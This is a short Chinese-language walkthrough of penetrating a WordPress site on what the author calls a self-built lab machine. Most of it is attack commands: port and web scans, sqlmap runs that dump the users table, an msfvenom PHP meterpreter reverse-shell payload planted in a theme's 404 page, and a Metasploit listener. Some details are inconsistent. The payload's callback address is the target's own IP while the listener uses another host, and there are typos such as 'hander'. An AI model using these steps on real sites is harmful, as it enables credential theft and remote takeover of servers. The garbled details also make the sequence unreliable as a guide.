wordpress网站渗透测试
WordPress是一款免费开源的内容管理系统(CMS)
WordPress官方站点
英文站点:https://wordpress.org
中文站点:https://cn.wordpress.org/
WordPress主要用于搭建网站,包括博客和其它各种类型的网站。它有非常多不同风格的主题来呈现不同的外观,通过使用不同的插件实现千变万化的功能,可以使用WordPress来创建不同类型的网站。
WordPress缺点
1、插件虽多,但是不能安装太多插件,否则会拖累网站速度和降低用户体验;
2、服务器空间选择自由较小;
3、静态化较差,最多只能生成首页和文章页静态页面,所以只能对整站实现伪静态化;
4、wordpress适合中小型的站点,轻量级的架构决定它不适合做大型站点;
wordpress渗透过程
注意:环境本人自己搭建
1.信息收集
2.网站爆破
3.上传木马
4.设置监听
网站ip:172.16.1.107
信息收集
nmap -sV -p- 172.16.1.107 探测目标靶机的服务版本信息
发现靶机开启22,80,443,8080端口
对80端口进行深入挖掘
nikto -host http://172.16.1.107对服务器80端口进行扫描
发现logig.php登录页面
网站爆破
使用sqlmap对网站进行暴力破解
sqlmap -u “http://172.16.1.107/login.php” –forms –level 3
sqlmap -u “http://172.16.1.107/login.php” –forms –level 3 –dbs 查看数据库
sqlmap -u “http://172.16.1.107/login.php” –forms –level 3 -D wordpress8080 -T users -tables
sqlmap -u “http://172.16.1.107/login.php” –forms –level 3 -D wordpress8080 -T users –dump
登录http://172.16.1.107:8080/wordpress/wp-login.php
上传木马
登录网页后找到插件,404页面
msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.1.107 LPORT=4448 -f raw > likes.php 生成木马
将木马上传到404页面中,刷新页面
设置监听
use exploit/multi/hander 使用监听模块
set payload php/meterpreter/reverse_tcp 设置payload
show options
set LHOST 172.16.1.134
set LPORT 4448
访问http://172.16.1.107/wordpress/404.php建立会连
成功入侵靶机